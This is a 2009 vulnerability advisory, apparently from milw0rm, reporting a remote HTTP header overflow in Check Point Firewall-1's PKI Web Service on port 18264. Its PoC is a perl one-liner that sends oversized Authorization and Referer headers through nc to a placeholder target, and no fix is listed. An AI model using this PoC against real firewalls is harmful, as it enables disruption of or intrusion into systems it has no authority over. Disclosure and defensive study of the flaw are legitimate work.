1 − Check Point Firewall−1 PKI Web Service HTTP Header Remote Overflow
2
3 − Description
4
5 The Check Point Firewall−1 PKI Web Service, running by default on TCP
6 port 18264, is vulnerable to a remote overflow in the handling of very
7 long HTTP headers. This was discovered during a pen−test where the
8 client would not allow further analysis and would not provide the full
9 product/version info. Initial testing indicates the ’Authorization’
10 and ’Referer’ headers were vulnerable.
11
12 − Product
13
14 Check Point, Firewall−1, unknown
15
16 − PoC
17
18 perl −e ’print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
19 "\r\nFrom: bugs@hugs.com\r\nIf−Modified−Since: Fri, 13 Dec 2006
20 09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
21 "\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"’ | nc
22 suckit.com 18264
23
24 − Solution
25
26 None
27
28 − Timeline
29
30 2006−11−06: Vulnerability Discovered
31 2009−03−29: Disclosed to Public
32
33 # milw0rm.com [2009−03−30]
Page 1/1
Check Point Firewall1 PKI Web Service HTTP Header Remote Overflow
Bugs NotHugs
03/30/2009